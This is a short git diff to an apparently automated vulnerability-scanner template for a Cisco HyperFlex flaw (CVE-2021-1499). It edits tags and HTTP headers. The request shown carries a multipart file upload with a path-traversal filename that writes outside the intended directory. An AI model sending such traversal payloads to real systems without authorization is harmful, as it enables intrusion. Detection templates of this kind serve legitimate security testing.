misc update
parent
1b3807a94d
commit
f033458524
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
|
||||
tags: cve,cve2021,cisco,rce,oob
|
||||
tags: cve,cve2021,cisco
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 5.3
|
||||
|
@ -23,9 +23,8 @@ requests:
|
|||
Accept: */*
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
|
||||
Origin: https://{{Hostname}}
|
||||
Connection: close
|
||||
Referer: https://{{Hostname}}/
|
||||
Origin: {{RootURL}}
|
||||
Referer: {{RootURL}}
|
||||
|
||||
-----------------------------253855577425106594691130420583
|
||||
Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
|
||||
|
|
Loading…
Reference in New Issue